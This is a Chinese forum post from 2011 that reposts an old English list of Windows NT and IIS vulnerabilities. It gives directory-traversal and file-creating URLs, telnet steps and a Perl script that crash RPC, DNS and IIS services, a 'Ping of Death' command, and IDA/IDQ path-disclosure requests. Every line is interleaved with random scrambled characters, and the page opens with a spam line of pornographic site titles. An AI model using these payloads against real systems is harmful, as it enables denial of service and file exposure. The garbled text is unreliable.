国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集


       找回密碼
       注冊(cè)

      QQ登錄

      只需一步,快速開(kāi)始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0
      ! \' y" T1 Z7 m& I. W7 H3 zA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      % L) v) A* L( G& j3 i$ F6 D# X: x$ y/ X* U0 Z
      A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      ! W( Y+ g2 T  H! m! A  n( ~# Q( b
      + N9 @6 c& c' [/ D# r4 gBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.% ^  G, V4 F, {2 V) l8 r/ r
      0 H0 L2 O0 u* @6 v. }) N7 H$ f
      --------------------------------------------------------------------! v9 g" W3 A* ^. n2 q1 E5 H/ H

      8 T# f& V1 s4 b& P( e受影響系統(tǒng):4.0# \' ]4 P4 k7 j+ B% w) C" B
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.) s4 h: \! _- ?8 L! h" }8 q$ L
      & m* V. H& u$ x+ B4 h
      If the file 'target.bat' exists, the file will be truncated.* E0 j+ A' h; b2 P! y3 C  x
      # a5 [! ^* _& l, c9 w, B

      + Y" A. N& c1 _) o4 _A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
      9 Y; {4 D7 _% P0 Q% D$ u9 C) r- E% ]3 d3 o. n
      ----------------------------------------------------------------------! t) N6 Z' k) c7 K6 k3 Z
      : L2 E: \* E, n2 W4 M6 k
      受影響系統(tǒng):3.51,4.0
      ; B& w) V- K/ JMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      ) m8 ~. }3 f4 N' w( j  v. ~; o3 d
      ' a  M0 o/ K# m8 W/ hThe following steps;, Q8 x( A6 `3 p, E6 D, T
      - B$ h9 n0 S$ A8 _$ o, |3 }
      Telnet to an NT 4.0 system on port 135 - B6 u4 F9 u: E
      Type about 10 characters followed by a <CR>
      & c; g* E0 A& s9 c' r8 P  FExit Telnet
      $ `2 z# O. A+ B( e! Aresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      + y" b9 s3 B7 W3 U' R( X
      , U' f2 O# M! L7 R# A* QWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted./ m2 G+ {9 [" I8 c( n+ S. N: g( \  T

      + n6 d+ }7 _7 p* O% G: ~3 {7 NThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.* {) O; v. t% p% ?6 e5 j

      + g; s" K! ~9 J9 `, o1 U" |4 `If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.$ V' ?9 A, J6 v  e
      " _8 j( W7 E. D1 W7 E* a/ r9 p& K
      The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):
      * Q9 Y* L# i! _1 q, |( {6 b8 Z$ q
      ! K  e) x- j4 M/ \/*begin poke code*/% F5 j6 b  l& Z" ]7 k* }: g6 J2 P9 e. [
      " R8 `9 I) Q. p3 j. `& l# G
      use Socket;
      & @1 N( C6 F/ u# G) Z/ yuse FileHandle;
      9 i* \4 |6 d; ~7 I& O% Vrequire "chat2.pl";' u; F  o+ S* V7 ]8 ~9 N

      $ b3 U% ~( k1 I3 t5 `$systemname = $ARGV[0] && shift;
      $ \9 i) s" \2 h! k; K3 l1 x( n: N3 N) a& P+ N
      $verbose = 1; # tell me what you're hitting9 H) T9 b- F3 v) N
      $knownports = 1; # don't hit known problem ports
      ' D9 a, o" q" @! E, L' @6 Ffor ($port = $0; $port<65535; $port++)
      $ I7 f( c0 G' k. `1 U! c( L' g3 M{
      & \  g; h# c8 |3 a& i4 v
      : H- ]; j2 \- g: y; i& S
      ( u" C. _9 `+ u$ Nif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {* `% Z/ j5 m* b1 p2 E5 ~
      next;
      . G* l" [* m$ E4 d: _}5 B8 }) M/ a2 J, r$ X6 K
      $fh = chat::open_port($systemname, $port);
      ( x  V+ J' E5 m' M8 `: uchat::print ($fh,"This is about ten characters or more");
      $ n9 ~3 X' B/ o( I& j) ]3 ?% t: dif ($verbose) {. a4 B9 S+ ^' g/ F4 P4 i+ D
      print "Trying port: $port\n";% j$ A& j5 a4 G1 h
      }
      6 V; W. {, R" nchat::close($fh);, L8 J9 q& P. o0 d  I5 y

      , `* C1 g; k/ H* B; ?1 R2 Z$ f}1 `0 q. f, k% M) n7 ~; i9 D
      ' Q/ p. \7 e% @  _0 l' N" x
      " r/ y8 ]+ X9 }4 T1 V: @
      /*end poke code*/3 S0 n7 v0 e" z, w

      # A$ f6 g- a9 \3 G+ ~# z+ ASave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername. K1 A# c2 P, W7 M2 }+ L

      ) ^/ F( M4 @- i( c--------------------------------------------------------------------------------
      ( t* J0 e$ c; q2 v+ L$ ^, d( l8 U+ Q4 }0 @) K4 h
      受影響系統(tǒng):4.0
      * Y2 E, X2 c9 |( ^- p, I2 N: s  uUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.& H" X% U3 o- F" F& T

      8 \. a% m4 E1 K5 Z- FThis attack causes Dr. Watson to display an alert window and to log an error: 3 a( I& {  l( S  ^( c

      3 z9 L5 }0 z5 i"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      & p0 h) s. r6 W# J  g5 F) E+ u7 }' p  L1 _  j) \
      --------------------------------------------------------------------------------% a) m! t, H! q3 U6 I8 m
      2 Y! ~% m+ X* g8 ?  p8 \, a) ]
      受影響系統(tǒng):3.51,4.0
      + G/ i$ c  Q  i9 ?- T, n7 ]Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:* {% ]3 r+ f5 X; a

      % b' {" p( D- b- BSTOP: 0X0000001E
      - ?% C9 p+ y! W" S7 YKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS3 w7 _# G5 T( v3 I/ Y% q' S1 K

      - {) b5 z  w0 e% ^! [$ j-OR-
      , |, S: `- ^$ Y8 b9 o. i, }% \( t1 o
      STOP: 0x0000000A$ I% G( ?2 d1 u6 i. y
      IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS) ?# P$ Q! [( H1 r# g
      0 ^; ^( q- p* W9 B# L2 X
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets." n& Q$ c3 j9 e4 A4 r- A; E+ q( S

      ' V6 p* D- I( y--------------------------------------------------------------------------------/ m5 R; M) |  b5 X
      ' a+ D4 e/ ?2 B3 H& l8 a+ N2 G* T
      Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). , I% A9 Y. u# i
      & F% Q, O9 P) c# P# u
      --------------------------------------------------------  }! p( I0 k% E5 {2 d$ C6 S
      ( m4 S( p! R: C3 p
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊(cè)

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-4-20 17:25

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表